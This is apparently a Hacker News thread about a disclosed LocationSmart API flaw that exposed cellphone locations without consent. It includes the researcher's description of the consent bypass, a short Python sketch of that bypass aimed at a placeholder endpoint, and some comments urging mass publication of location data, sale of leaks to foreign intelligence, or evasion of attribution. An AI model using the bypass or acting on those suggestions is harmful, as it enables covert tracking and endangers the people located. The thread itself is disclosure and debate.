Oh, man, what a missed opportunity to make the average Joe Sixpack aware of cellphone tracking and surveillance. If the researcher had queried every single cellphone number in the United States (for as long as the API kept working) and then published the location of every cellphone in the USA, then laymen might care. When people can query the list and see their own personal information being broadcast, they will understand. When they can look up any cellphone and pinpoint the location of their wife, husband, girlfriend, boyfriend, boss, children, or neighbor, they might get an inkling that privacy isn't such a stupid thing to worry about.
I guarantee that by next week, this whole thing will be forgotten and nothing will have changed because privacy and surveillance are too abstract for most people -- they need to see all their personal information that's being collected. I admire the researcher's integrity for exposing it the right way (reporting it to CERT and the company itself), but going full Snowden would have had so much more impact on getting better privacy-preserving laws and technology.
If the researcher had done that -- queried every cellphone and published it -- I fully expect they'd receive the same treatment from law enforcement that weev and Aaron Swartz got, if not worse.
Given the treatment dealt out to whistleblowers, I'd be OK if they took financial benefit from leaks:
Auction leaked data to foreign intelligence or companies, then make the price known. We've been warned enough times. That's the only way Americans will put a price on privacy, and fines for unsecured systems will climb through the roof, with willing enforcement by both companies and customers. And the whistleblower gets paid, which beats rotting in Russia for years.
> If we are going to have a flawed system, I’m glad when folks like this guy take the brunt of it.
This is wrong on multiple levels.
1. It normalizes and makes it seem slightly more acceptable to have a flawed system;
2. This guy did not "take the brunt" of it. Plenty of other people — dangerous nut jobs and otherwise — have unjustly suffered similarly or worse at the hands of the US judicial system.
3. His conviction was later vacated and he was released.
Punitive brutality (outdoor tent concentration camps, water-boarding, execution), locking up people for their beliefs, over-incarceration and a "throwing away the key" mentality engender neither reform nor a civilized society... they suggest a normalization of psychopathy.
However, I still hold a position that when a system fails, I’d rather it fail in the direction of Nazis.
But perhaps what you are saying is that in a system with a 1/100 failure rate, I might be less incentivized to fix the problem if the 1% ends up being people I don't like — that seems like an incentive worth being aware of.
I don’t think someone should go to jail for accessing public data (or for being stupid and having “neoNazi” beliefs). I’d vote for laws to correct such problems in the system.
However, as a human, when the system fails, I’d prefer it fail in the direction of Nazis.
Perhaps I have room to mature or grow in this area, I’m open to it.
You keep saying "when the system fails, I’d prefer it fail in the direction of Nazis". That statement is not much different from "When cancer strikes, I’d prefer it strike one of the Nazis."
Neither cancer nor the US judicial system's unfairness singles out Nazis. Your sentiment, "when the system fails, I'd prefer it fail in the direction of Nazis", goes nowhere, because when the system fails, it does not go looking for Nazis to fail in the direction of. There's just no connection between the two parts of your statement.
We should perhaps stop using Weev as an example of an innocent victimized by overzealous prosecutors. His actual conviction was trumped-up, but he'd likely have been in prison already if all the people he harassed and abused had pressed charges instead of trying to get on with their lives.
Neither the fact that Weev is a gigantic asshole, nor your conjecture about what he might have been convicted of since, retroactively erases the injustice of the DOJ's absurd prosecution of him for the AT&T 'hack' - which was IMO more about AT&T's wounded pride and unwillingness to admit that they had effectively given that customer data away.
The AT&T hack is a perfectly good example, probably the most relevant one we have, of someone doing exactly what the GP suggested. Which undoubtedly would face much the same kind of overzealous prosecution, if not much worse given the current climate.
I do agree with GP though, and wish more researchers would be a lot less polite and well-behaved with their disclosures, sow a little more chaos even. This really was a golden opportunity to have a real national impact, and to give a huge number of non-tech people an unprecedentedly effective wake-up call.
He doesn't have enough technical skill to pull off anything. The AT&T hack, a for loop in PHP, was beyond his technical ability, and he had to get someone else to do it.
Blogging about being a bad boy and pretending to be master of Anonymous/the cyber Aryan nation is his gimmick. He wishes he was David Koresh, but he's completely harmless.
I have never seen him code, but I personally spoke with weev a number of times while he was a regular at a (in)famous SF hackerspace.
He demonstrated a thorough familiarity with ptmalloc internals, enough to correct someone else's remark about fastbins (meanwhile taking frighteningly large hits of whippets).
Additionally, he was the first person I had ever heard mention Rust.... wayyy back in 2012 (I'm embarrassed to say I thought he was talking about Racket and tried to correct him - I was 19 and thought I knew everything). He seemed to know quite a bit about the language even then.
He continued to discuss other topics arising from this with other hackers. One such conversation I remember more clearly was his exchange with another hacker (a quite skilled one by my estimation) where he seemed to speak rather cogently about the relative merits of complete semantic tableaux versus SMT solvers for determining "real ptr lifetime" (beyond just adhering to a set of idioms that enable a constraint solver to verify reference use).
So if he can't code PHP, then that's even more impressive.
As an aside - in person, he came across as very warm, funny, charming and even deliberately inclusive.
It feels strange now, but long ago, if you looked at him with the right shades on, he'd seem to give a nudge-and-a-wink that the "trolling", including his iconoclastic project of the time - the posthumous baptism of Muhammad's remains via becoming a Mormon deacon (of some sort??) - was all intended to be thought-provoking irreverence rather than chaotic evil. No matter what was discussed, he always gave the impression there was something more there, something almost hermetic.
In the intervening years my view of him has assumed a different proportion. Those weren't all harmless culture-jamming tricks pulled off in the name of some Discordian spirit that lies somewhere behind the neocortex of the hacker mindset. At that time, and for many years before, there were pranks, tricks and trolls that were unimaginably cruel, purposeless and petty.
Since then, prison has hardened him further into a wicked racist who, for lack of a better word, is insane.
Weev was at one point at least somewhat technical. He reminds me a bit of Terry Davis: interesting and quirky at one point in the past, but descended into a sort of pitiful madness.
Terry Davis has real technical chops and has written more code for his 'temple' than most people will write in their entire lives. He is God's programmer after all.
How are you qualified to make this claim? According to Andrew Anglin, he actually runs the infrastructure for The Daily Stormer[0] so he must have some level of technical competence.
Well sure; so just tip off a foreign national who already lives in Russia or whatever, and they can do it. Unlike an NSA leak, you don’t need physical access to places only US citizens can be in to touch this data; you just need an internet connection.
> so just tip off a foreign national who already lives in Russia or whatever, and they can do it.
That ends up being conspiracy to commit the crime, which hits you just about as hard as the crime itself. You'd better be _very_ confident that the FBI/NSA won't be able to intercept your communications or tie you to the foreign national who commits the crime.
You're literally suggesting that a researcher should go to Russia so that they can exploit the vulnerability before disclosing it to the people of the United States. I have a feeling that wouldn't fly well in court.
Errr, no... I meant that there would be effectively no consequences if, instead of a US-born security researcher discovering this, a Russian-born Russian-citizen security researcher discovered this. It's a counterfactual, not a suggestion.
A suggestion would be: if you want to research vulnerabilities without the possibility of prosecution, why not research the vulnerabilities of other countries' companies, where those countries have no extradition treaty with your home country? Such companies can still pay you if they appreciate what you've done, but they can't sue you if they don't; and even complaining to their government about what you've done won't really amount to anything in the end.
This, I think, solves the problem, at the cost of raising two other problems:
• Your own government might not appreciate you improving the security of [essential industries of] its enemies;
• the foreign government might interpret the vulnerability research as an act of cyberwar (much like, say, flying your own drones over a foreign military installation as a private citizen would be interpreted as an act of regular war), and your own government might have to trump up some domestic charge to pin on you in order to appease them.
The first factor is more important in time of war (you might be branded a collaborator!), while the second is more important in time of peace (you might be branded an instigator!). So there are probably very few "exactly right" times to do this where you'd likely get away with it scot-free.
Punching someone in the face to get them to appreciate the risk they are running of being punched in the face is not ok.
I appreciate the sentiment here, but no. Showing you how easily you can be robbed because of your poor locks by actually robbing you is a crime. Infringing everyone's privacy to show that it is possible is still infringing everyone's privacy.
You can't claim to infringe privacy because you understand why it's so bad to infringe privacy any more than you can mug people to show them how bad it is being mugged.
If people are already being punched in the face in secret, 24/7, doing it ONE time with their knowledge to open their minds to their reality sounds pretty good to me.
If the researcher had done that, they would have gotten prosecuted by the FBI. Probably a better approach would have been to track every major journalist, tip them off that you know their location, and then give them the scoop, so you would have major press coverage for a few days in all the papers.
The collateral damage would be considerable. How many victims of partner violence tracked to their new home and attacked would be too many to make it "worth it"? And why should a security researcher be the one to make such a decision?
I honestly doubt it. Or did you forget about Equifax? Someone did have millions of records covering everyone's credit history, including birthdays and past addresses.
If this had been a black hat leak where someone was caught selling 300 million people's location data, it would have made a bigger story, yes, but it would be in the same bucket as Equifax right now (and, to an extent, Snowden as well).
>Someone did have millions of records for everyone's credit history including birthdays and past addresses.
The point is to make it public, not to claim it's out there somewhere. The ability to go in and see your data just sitting there in public is what makes it 'real' to people who don't think they care about privacy.
The fact that this Equifax data hasn't surfaced yet makes me think it may have been collected by state actors and is being kept for more nefarious purposes than selling it piecemeal on the dark web.
Imagine the chaos caused by a distributed, automated, nationwide creation of fraudulent accounts and debts being created.
It would bring the financial system to a halt until the fraudulent transactions could be identified and filtered out.
You're absolutely right. It's too bad this opportunity was missed. Comparing such an act to weev or aaronsw (RIP) is not unreasonable, but aren't we all ready to make such a sacrifice?
That Snowden name drop isn't really appropriate. Edward Snowden has always been extremely responsible with his leaks, the exact opposite of what you're suggesting (dump everything no matter the privacy implications).
It's not like that at all. Here, you are actually opening the door and looking at what's behind it. Over and over again, knowing it's prohibited, for the purpose of getting data you know you're not supposed to have access to.
Any context at all would be appreciated. The Krebs article mentions almost no context whatsoever about the bug except that you found an unauthenticated API.
Can you give some details about the API?
• Did you need to exploit SS7 flaws?
• Did you reuse some kind of nonce or session auth token, or was there no security whatsoever?
• Did it take phone numbers, hashes of phone numbers, bulk queries, etc.?
• Can we see example output data that you collected from the API?
• Did you notice the API endpoint in the devtools network tab, or did you have to dig much deeper?
In short: it was a fairly straightforward modification of the usual API flow, to omit the secondary API call that requests consent, then request a JSON location payload instead of an XML payload. For whatever reason, that bypassed the usual consent check and just dumped the phone's location.
Man, I got here once the link had already changed, and your write-up is concise and tells all of the necessary information, versus the Krebs article, which is way too long and really doesn't say much that's useful. Thanks!
When I read this I just started cackling like a mental patient.
The first thing that comes to mind is if this is on a well known framework, I want to know because those security defaults are awful.
However if these guys rolled their own API auth system and messed up something this simple, or deliberately modified framework defaults... I can't even imagine what conversations happened at their offices this morning.
That was unbelievable, nice find. Hope you share a PoC on GitHub showing how trivial it was. Welcome to the future, where an unauthenticated API from a company can tell you the position of anyone.
Was there enough of a delay between the request and the reply to mitigate the risk of a bad actor flooding a particular cellphone with battery-discharging pings?
The request-reply delay was between 3-5 seconds in most cases, but sometimes much higher for unknown reasons. I suspect that, if this is pinging the phone, you might be able to drain the battery remotely, but that's a fairly secondary concern considering the magnitude of the primary issue.
There is no phone pinging going on. The carriers most likely keep a database of most recent location of their customers based on customer phones pinging towers.
At most, hitting LocationSmart over and over would probably just hit the carrier databases over and over.
Congrats on the find! How did you know to test requesttype=locreq.json? I googled for "locationsmart locreq.json" and your blog post was the only result.
The first request is to "requesttype=statusreq.json", returning a JSON object, and the second to "requesttype=locreq" returning XML. On a whim I decided to try and get JSON location data out (I like JSON better anyway), and found that the two formats did not exhibit identical behaviour. On exploring that further, I found the consent bypass bug.
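For anyone curious what that looked like in practice, here is a rough Python sketch of the flow as described. The "requesttype" values (statusreq.json / locreq / locreq.json) come from this thread; the endpoint URL, the phone-number field name and the exact consent semantics are placeholders I'm assuming, since the /try/ page is now offline.

    # Illustrative sketch only; URL and field names are hypothetical.
    import requests

    TRY_API = "https://example-locationsmart-demo.invalid/try/api"  # hypothetical endpoint

    def intended_flow(phone: str) -> str:
        # First call: the consent/status check (the step that involves the user).
        requests.post(TRY_API, data={"requesttype": "statusreq.json", "phone": phone})
        # Second call: the location request, returned as XML once consent is granted.
        return requests.post(TRY_API, data={"requesttype": "locreq", "phone": phone}).text

    def bypass_flow(phone: str) -> dict:
        # The bug: skip the consent step entirely and ask for the JSON variant of the
        # location request; reportedly this returned the phone's location directly.
        return requests.post(TRY_API, data={"requesttype": "locreq.json", "phone": phone}).json()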
I found it worked for all four major carriers (AT&T, T-Mobile, Sprint and Verizon) but around 1/10 phones failed to geolocate for unknown reasons. Unfortunately I didn’t get a large enough sample size to test these before it was taken down. It didn’t seem to correlate to device or carrier - I was locating iPhone and Android devices with equal ease.
Perhaps those were data devices like hotspots, tablets and the like that can't make calls, so there is no E911 mandate for those devices? IIRC some newer LTE data devices don't even have GPS, which would make locating a device harder if you're a cellular carrier.
> newer LTE data devices don't even have GPS, which would make locating a device harder if you're a cellular carrier.
Nope, AGPS isn't required. At any given time, multiple cell towers can hear your device's signal. In the rare event it's just one, you still get a surprisingly accurate location due to a quirk of cell towers (there's never just one antenna; except for small cells in places like subways, it's usually three or more using sector panels). Given a 120° direction (or less) and a distance based on time of flight, you usually get within a few blocks in most cities, and that's without factoring in triangulation or other more advanced localization techniques. One carrier (maybe more) can localize a person to within ten feet (not everywhere, but in enough places to turn it into a product they sell), which is generally more accurate than AGPS.
Keep in mind a large part of what a cellular carrier needs to do is know which cell you're in so it can route traffic to your device. While they don't necessarily get device GPS access, they literally cannot do what you're paying them for if they cannot locate you down to the nearest cellular base station. (And in most areas, they'll have you connected to enough base stations that they can at least roughly triangulate you using signal strength to estimate distance from multiple cells. I don't know if 3G/4G/LTE allows base stations to calculate round-trip time of flight to get even better distance accuracy like Wi-Fi does, but it wouldn't surprise me if there's at least something in the spec that can be abused to allow that...)
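To make the geometry in the two comments above concrete, here is a toy sketch: a single-sector estimate from a bearing plus a time-of-flight distance, and a crude proximity-weighted average across several towers. The great-circle math is standard; the weighting scheme and any implied accuracy are illustrative assumptions, not how carriers actually compute location.

    import math

    EARTH_R = 6_371_000.0  # mean Earth radius in metres

    def project(lat: float, lon: float, bearing_deg: float, dist_m: float):
        """Point reached by travelling dist_m from (lat, lon) along bearing_deg."""
        brg, d = math.radians(bearing_deg), dist_m / EARTH_R
        lat1, lon1 = math.radians(lat), math.radians(lon)
        lat2 = math.asin(math.sin(lat1) * math.cos(d) +
                         math.cos(lat1) * math.sin(d) * math.cos(brg))
        lon2 = lon1 + math.atan2(math.sin(brg) * math.sin(d) * math.cos(lat1),
                                 math.cos(d) - math.sin(lat1) * math.sin(lat2))
        return math.degrees(lat2), math.degrees(lon2)

    def single_sector_estimate(tower_lat, tower_lon, sector_azimuth_deg, tof_dist_m):
        # One 120° sector panel: aim down its centre line at the measured distance.
        return project(tower_lat, tower_lon, sector_azimuth_deg, tof_dist_m)

    def multi_tower_estimate(observations):
        # observations: list of (lat, lon, estimated_distance_m) for towers that can
        # hear the phone; weight inversely by distance as a crude stand-in for
        # proper trilateration.
        weights = [1.0 / max(d, 1.0) for _, _, d in observations]
        total = sum(weights)
        lat = sum(w * p[0] for w, p in zip(weights, observations)) / total
        lon = sum(w * p[1] for w, p in zip(weights, observations)) / total
        return lat, lon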
Was that random phones, or phones you knew were actively in use?
I'd imagine a cellular network has some "exception handling" for devices that are not switched on or in range of any of its base stations. And I hypothesise that whatever mechanism this is using might not crank up whatever "scan the whole network" behaviour might occur if a not-currently-geolocated phone gets an incoming call/message? 1/10 seems too high to account for that, though...
I discovered the bug yesterday, followed responsible disclosure with US CERT (based at CMU, so we got things moving very quickly there), and the bug is now fixed.
If the CFAA bars legitimate security research like this, then we would all be truly fucked.
"If the CFAA bars legitimate security research like this, then we would all be truly fucked."
You must be new here. This is why we have all been saying that the CFAA is truly fucked, for many years now :)
But yes, you did play with fire on this one. People have been convicted for far more innocent activities than this. I assume you're a student or recent grad and may be a bit optimistic about the world we are in. Don't fuck around under your real name or IP address when you do this kind of thing. "Accidentally" dropping a ' into a webform just to see what happens is one thing, but you won't be able to feign innocence with something this involved. Unless you are both the client and the server, or the other party is unambiguously inviting testing (such as a bug bounty), you have no claim to legitimate security research.
It's still awesome that you found and drew attention to this. It's important work. But, cover your ass next time, or know what you're getting into. Especially hitting obscure companies like this, who notoriously exist in a culture very unlike the typical valley-type company, where such activity makes them feel very threatened and outraged, often turning to law enforcement or initiating legal action.
Also, the term you're looking for is coordinated disclosure. Do not let the vendors define "responsibility" as they have attempted to do with the injection of that term into the lexicon ;)
CFAA probably does bar research like this; your right to test something for security flaws technically ends where someone else's server hardware begins. In reality, the optics of this vulnerability are so bad that you are vanishingly unlikely to take any legal shit for it. But be careful extrapolating from it. If you have questions about the legality of this kind of testing (and you should): consult a lawyer. Small price to pay.
Wait, yesterday? And the fix is already deployed to production today? That's either some truly impressive engineering from a company that made a freshman-year-level security mistake, or whatever patch they put in place to fix this is just as leaky as the original bugged version and it's just a matter of time.
This for sure! My theory has also been that it's possible they literally just needed to add "if (subscriptionApproved) {" to the top. Not exactly a ton of code!
They just killed the try page entirely. It's now a redirect to the home page. Hopefully they don’t try to bring that page back up without fixing all the bugs...
Why would he, (neo), have any target from the law on his back? He wasn't sharing or selling the information. LocationSmart should be the ones getting fucked.
Under the ridiculously broad scope of the CFAA, that doesn't matter. The CFAA can be (and has been) twisted to prosecute people that do anything to a computer system that they do not own if the system owner could even remotely perceive said action as harmful. It's been used in the past to prosecute security researchers for accessing publicly available websites because the website owners claimed that they weren't "meant" to be public, they were only publicly accessible to make it easier for the actually "authorized" people to access them.
Even doing something like an nmap or a simple ping against a server that you're "not supposed to" could put a target on your back from an overzealous prosecutor.
If we want to be really pedantic here, didn’t LocationSmart violate the CFAA? Their system queried the location of users’ devices without their consent. Does tower triangulation count as accessing the device?
The carrier determines the location of the phone because it's a cell phone. The Carrier provides the information to LocationSmart. There's no querying of the devices by LocationSmart per se.
Would you mind paste-binning/gist/posting the script? I'd be interested in seeing exactly how easy it was. I was playing around with the site last night but couldn't get anywhere.
Was this in any way protected or did you just watch network requests in your browser, see an endpoint, and curl it? I'm not diminishing your discovery, just wondering if it was utterly trivial to use...
I was going to poke around that site yesterday after I saw the article, because looking at their website it really looked like there had to be some vulnerabilities. What you tried is exactly the kind of thing I would have looked at first.
Yep, there’s no way you’re the first to find this. Honestly I’m at a loss for words how absurd this is. We just need to assume this was actively exploited for who knows how long.
I definitely do not assume that I'm the first to find this, only the first to actually get it taken down. Worse, as the try site's been up since at least Jan 2017, that's nearly 18 months of exposure.
We won't know what the real exposure level was unless someone asks LocationSmart very persuasively.
Ideally, they have access logs (for the web API, their backend location requests, or both) that could be used to detect patterns of misuse. Unfortunately, since their API is exclusively POST, the web server access logs will be less useful, but they could be used to detect e.g. direct API queries that skip the consent request.
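As a sketch of what that misuse detection could look like, assuming LocationSmart kept application-level logs that record a timestamp, client IP and the posted "requesttype" value (plain web access logs would not capture POST bodies), the CSV format and column names below are entirely hypothetical:

    import csv
    from collections import defaultdict

    def find_consent_bypass(log_path: str, window_s: float = 300.0):
        """Flag location queries with no recent consent/status request from the same client."""
        last_consent = defaultdict(float)   # client IP -> time of last statusreq call
        suspicious = []
        with open(log_path, newline="") as fh:
            for row in csv.DictReader(fh):  # assumed columns: ts, client_ip, requesttype
                ts, ip, rtype = float(row["ts"]), row["client_ip"], row["requesttype"]
                if rtype.startswith("statusreq"):
                    last_consent[ip] = ts
                elif rtype.startswith("locreq") and ts - last_consent[ip] > window_s:
                    suspicious.append((ip, ts))
        return suspicious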
Do you think your graduate degree was necessary to find this bug, or could any idiot with devtools open find it just by trying to automate the site?
Your descriptions thus far are pretty vague but man... it sounds like there is a VERY high likelihood that this was being exploited by malicious actors on an ongoing basis.
https://www.robertxiao.ca/hacking/locationsmart/ provides the technical details. In short: much more likely the latter than the former. And this /try/ page has been up at least since Jan 2017 (~18 months).
I didn’t mean this to be offensive or crass. I was asking because generally security exploits are ranked by (a) severity and (b) triviality. That is, a severe bug that is extremely difficult to exploit is not as alarming as a severe bug that is trivial to exploit.
When laypeople read that a CMU researcher discovered a bug, they might assume it is not trivial. So in that sense mentioning the PhD almost does a disservice to expressing the triviality of the bug.
When a high school kid in Hungary discovered he could purchase train tickets for any price by changing it client side, non-technical people could understand it was a trivial bug. When a CMU researcher discovers a bug, they likely assume the opposite.
Sorry if this is a stupid question, but do we know if this location was collected by the operating system of the mobile devices? Or was it being collected simply from carrier data? Also, since this was just an API vulnerability, would I be correct to assume it's still being exploited by this company's customers?
"Phase II E911 rules require wireless service providers to provide more precise location information to PSAPs; specifically, the latitude and longitude of the caller. This information must be accurate to within 50 to 300 meters depending upon the type of location technology used."
Sad thing is, this has been going on since the late 1990s; back then they had lower-level reps at AT&T handling law enforcement location requests manually. Knowing a few of them, it took forever for those former reps to get cellphones, due to a fear of being tracked after having dealt with those requests.
I've also noticed multiple people in that group will purposefully leave their phones behind and drive their older cars when they choose to have a tracking-free day; even two decades later, exposure to how easy it is to pull live location data still notably impacts their behavior.
With firsthand experience of license plate scanning, they might reconsider their old cars. And who knows what they'd do if they also had firsthand experience of facial tracking cameras! Perhaps they'd invent a new cyberpunk costume, turn into night owls, or take up cave diving...
I didn't have that many Canadian numbers to test, but it worked for one number on Telus, failed for one number on Bell, and returned a cached result for another Telus customer (they were in the States, and the API returned their port of departure in Canada). This shouldn't be construed to imply that Bell phones cannot be tracked - Bell is noted as a partner of LocationSmart, so it could well have been a glitch or other temporary issue.
> LocationSmart’s home page features the corporate logos of all four the major wireless providers, as well as companies like Google, Neustar, ThreatMetrix, and U.S. Cellular.
Funny how they removed the corporate logos they had on their website from yesterday to today:
Oh wow, I can't believe they left all their CMS resources exposed with open directory listing... that's quite a find. Their website reports that the "trylocationsmart500x250-w500h250.png" file, which is a screenshot of an older version of the vulnerable website, was uploaded 2016-09-14 22:20. This means the vulnerable site has probably been available since at least September 2016.
What honest purpose would telcos even have to sell this data?
All of them replied saying "we will cut clients not following the program guidelines"... what are those guidelines?! And why is that left arbitrarily for the companies to decide, and not mentioned anywhere in the consumer agreements other than some vague "we may share your data with whoever"?
Providers who use these services need to agree to follow guidelines such as obtaining opt-in, sending notifications to devices being tracked with the option to opt out by replying STOP, etc.
I worked for a "household name" towing insurance company years ago. Often times people calling in don't actually know where they are, because it's on a highway somewhere unfamiliar. We integrated with a service provider to be able to get the GPS through the phone. It worked largely like you suggest, we hit an API, it asks them permission, they grant it, we get GPS.
Would that be Geico? They were mentioned doing that in the comment here¹:
“It's funny that this is coming up now. The other day I was on the phone with Geico's roadside assistance and they wanted to know my location. I told them I didn't have their app downloaded, they said it wasn't a problem and they could get it without it. Sure enough they could. I checked their disclaimers [1] and they purchase the data from my cell carrier. They didn't even have to know which one.
Once I called 911 to report someone driving on the wrong side of a freeway. I was half asleep in the passenger seat and didn't notice we were already on another interstate. When I said "on highway A", the operator corrected me: "don't you mean highway B?", and she was right. I did not get any GPS alert or confirmation on my phone, which, given the service I was calling, I think was fine.
It is definitely based entirely on inferred data from cell tower usage. No gps involved whatsoever.
Well, most of the clients of this service are law enforcement. "The FBI is requesting permission to track your location, reply YES to allow"? Yeah, that's not going to happen.
But as I read the article, the location data is only at the resolution of which cell tower they're connected to. Doesn't 911 get better location info than that?
I'm not certain what the actual product uses, but the LocationSmart demo posted here last week had three data sourcing options: "[Cell Tower], AGPS, Best Available"
What if law enforcement knew? What if this was an intentional backdoor for law enforcement to abuse? I know, you can apply that to any vulnerability ("what if X knew"), "don't assume malice [...]", it's merely hypothetical, but still.
The telcos are almost certainly selling it. Verizon used to have a page noting that LocationSmart was a "Network API Partner": https://archive.li/tCLrd
To do this you need access to the SS7 network. I don't believe this is the issue in question, as the providers have APIs for partners doing location services.
Source: I used to have direct access to such an API
This sort of mass tracking shouldn't exist and it certainly should be illegal to sell this data. Anyone who is capable of tracking (e.g. satellite companies, cell companies, etc...) should be required to immediately report any request to access this sort of data. If it's a government, force them to publicly give reason and use that to scope the investigation. Our technology makes this possible, our culture doesn't have to.
I don't see how "publicly" won't fly. If, for the sake of an investigation, they need discretion, that should come with a reveal time or a reveal condition that is not too broad. For example: "when the investigation is complete or two years, whichever is shorter." Then match up requests (including the rationale given on the form) and responses. Requests outside that process are illegal.
Sure, I could go with two years. Even that's probably too long. But publicly announcing the tracking requests at the time they start? Announce to the suspect that they're being tracked? That's a bit of an unreasonable handicap to an investigation.
A warrant is not an unreasonable handicap. No warrant? No data. If you don't need the data bad enough to get a warrant, you don't need the data bad enough to get it.
I certainly don't encourage it, not least because it's illegal, but there is only one way I see this getting fixed: someone publishing the location data of members of Congress and the heads of federal agencies, revealing sensitive information, e.g. an undisclosed meeting, repeated visits to an unexpected embassy, or overnight stays with a young, good-looking aide.
As the person who found this bug: I certainly don't condone any kind of misuse like this. I strictly tested only against people with whom I had prior agreement.
My hope is that a vulnerability like this sparks the right public discussion to get real change effected in a positive way, but in the current political climate I am sadly not optimistic.
Thank you for your work uncovering this. Having entertained myself with something glib, let me offer something useful. Groups I encourage you to consider reaching out to:
Write to a congressman, explain that you are going to track his cellphone, like you could any other American's, for science, and say that if he/she is not OK with it, they should just reply to your email within 48h (or whatever SLA they mention for a response). Done, approval granted.
High ranked officials (and other people who pay large phone bills) might have special treatment from the telecoms and maybe their location isn't shared.
Just to be clear: from his discovery you wouldn't be able to look that info up, only the most recent location. That doesn't mean someone didn't hack the site 18 months ago and keep tabs on every single person of high interest. But then again, you can just buy a membership from the website and obtain that data totally legally.
Because Congress fucks enough old people as it is? I'm kidding.
On a more serious note, being young makes it appear as though the congressperson is taking advantage of an "impressionable" employee. Being good-looking makes it look like the relationship only exists because of the congressperson's rank.
We are going to have to look hard at contract law versus the Constitution and its amendments.
All sorts of contractual gags keep people from commenting on bad and sometimes malicious behavior, because agreeing to them is the only way to get the job they're trained for, etc.
Companies insist on the contractual right -- in small and seldom-read print buried within a sea of other print, for an "everyday" purchase -- to essentially violate the 4th Amendment (I think; maybe I've got that wrong) protection against unreasonable search and seizure. I guess that right was aimed at the government, but it seems it should apply to these government-sized corporations and multinationals as well. They're selling us what has become an essential service; try living most people's lives in the U.S. without a cell phone.
And hey, we know governments are making use of those data as well. A typical government ploy: purchase data from a private third party that the government is not allowed to collect directly itself. Sorry, but that "scrubbing" indirection shouldn't exempt it from constitutional protections.
Divide and conquer. Whereas solidarity actually requires some privacy and wiggle room, to function effectively and autonomously in the real world.
You already hit this point but: the Constitution, and especially the Bill of Rights, is about defining a legal structure of government. We can all agree that privacy is a "universal right," but neither history nor legal precedent supports that interpretation unequivocally (even with regard to the government specifically; you can read some really interesting Constitutional history about the "right to privacy" and how it arose as a concept in the late 1800s; Brandeis's "The Right to Privacy" is a fascinating historical document). The only true remedy to this problem is laws enacted by Congress. We need to stop talking about this in a wishy-washy idealistic way and start talking about realistic, precise, and legal solutions, which means enacting specific laws.
This is an outsider's perspective (I'm Australian) but it seems as though more and more is being done through Executive Orders - the Korean War, the EPA, Obamacare - instead of through proper channels.
As far as I can tell, this is because Constitutional amendments are hard to enact (in the case of the EPA and Obamacare) and for reasons I don't understand, Congress doesn't seem to want to declare war any more.
Is that a fair assessment, or am I getting only part of the picture?
You've got the right idea behind your assessment, but the pieces in play are a little off.
Federal laws (Obamacare/ACA) and federal entities (EPA) are created by Congress.
The executive branch (President), can issue executive orders, but they are limited to authority granted by Congress and the constitution.
The judicial branch is there to verify that the other two branches are staying within their constitutional authority.
Constitutional Amendments are difficult to enact, but that is intentional. Amendments limit government at all levels. Congress can't make any law, and the executive branch can't issue any order that conflicts with the constitution. The only thing you can do is amend the constitution again.
The problem is that Congress has become a gridlocked mess while also offloading a lot of its authority to government agencies acting on its behalf under the executive branch, effectively increasing the scope and power of the presidency and, by extension, the reach of executive orders. This has also pushed the judicial branch into a much more active role than it was designed for.
Edit: It's also one of the contributing factors in the heated elections in the USA. As the power of the presidency grows, people become more invested in seeing their person in charge.
Sure, but those aren't the only two options. You can just pass normal laws. They don't have to be amendments. That's also difficult, though, due to the extreme partisanship in our political environment, but it's theoretically the fitting solution.
My understanding was that at least some of those - Obamacare and the EPA - required either an Executive Order or a Constitutional amendment, because the powers required were not granted to the Federal Government by the Constitution.
Agreed that declarations of war can just be declarations of war, no amendments required. It strikes me as odd that Congresscritters would be okay invading a country, but not okay with declaring war against them.
US Agencies don't need a Constitutional Amendment to come into existence - the usual method is simply a law that Congress passes that the President then signs. E.g. Dept of Energy, Dept of Education, Dept of Homeland Security, Dept of Housing and Urban Development, etc. going way back to the Dept of Foreign Affairs (precursor to Dept of State).
Obamacare (Patient Protection and Affordable Care Act) was also created by Congress - bill passed in both houses, signed by the President, upheld by the Supreme Court. That's basically a textbook example of how the system is supposed to work.
I'm not sure why the EPA (and others, like FEMA) were created by Executive Order instead.
As far as why Congress hasn't declared war since WW2, they've basically rolled up their say into the War Powers Act and the War Powers Resolution which provides for them being informed and issuing continuing approvals. They can then support the President (as Commander in Chief) but not officially declare war.
My understanding was that the IRS was directed to enact Obamacare by Executive Order, because they (the Federal Government) have no Constitutional mandate in that area. Same with the EPA.
That's already been ruled out by the SCOTUS. "Eleanor Roosevelt, Chairman of the United Nations Commission on Human Rights when the Declaration was drafted, spoke for the United States and stated that the Declaration "was not a treaty or international agreement and did not impose legal obligations; it was rather a statement of principles."
There is however the International Covenant on Civil and Political Rights, which is an international treaty. However, in practice, the ICCPR functions much like the UDHR - a statement of principles rather than a treaty which provides for proper enforcement. The US apparently specifically indicated when it ratified the ICCPR that it didn't consider the treaty "self-executing" as a matter of US domestic law and thus you can't enforce it directly in the US courts.
> I guess that right was targeted against the government, but it seems it should apply to these government-size corporations and multi-nationals, as well.
I could see a corporation tracking people for good. E.g. a travel agency that detects where its clients are en route until they get to their final destination, and automatically reroutes them for flight delays or traffic jams. That would be something I might pay for.
You don't wake up suddenly in a totalitarian state. Total surveillance is one step away and once the infrastructure is in place it will be used. Commitment to basic values of privacy and human rights has been reduced to posturing against others and denial about what is happening at home.
Until there are proper protests and pushback, the creep will continue, and the useful idiots and the ignorant will continue to muddy the waters and dilute the threat, only to slink back into the woodwork once the real consequences become visible.
And with all-encompassing surveillance, even organizing protests and dissent will become difficult without the kind of sacrifices most people are unwilling to make. Just today there is a story of a guy getting a knock on the door from the police [1] a few hours after posting about eating mushrooms on Facebook.
It's legal because, in the United States, this is considered the carrier's data, not your data. And they can sell their data however the hell they please.
So, for example, if dreadful foreign hackers were to establish a fake marketing company, sign an agreement with LocationSmart (or the telecoms directly) and spy on government and military officials to gather compromising information for the next election cycle, this would be legal too? Sounds nice for foreign hackers.
When journalists, or American political parties do this, we call it journalism, or campaigning, so... I'm not sure what the problem is. Is it the fact that's done by a foreigner?
Yet, we allow American branches of multinationals, or domestic companies owned by foreigners to directly influence politics and politicians, so I'm still not sure where the issue is.
If you don't want embarrassing scandals from your preferred political party sinking their chances at winning elections, perhaps it should stop having embarrassing scandals? No, surely, the fault is in the people publicizing them...
It is supposed to only occur with explicit user consent. You have to opt in. That is kind of the whole point of this thread. The researcher, who has been active in this thread, found a way to bypass the consent feature.
Do we need to opt-in with our Carrier, or with LocationSmart?
The first one would make more sense than the second.
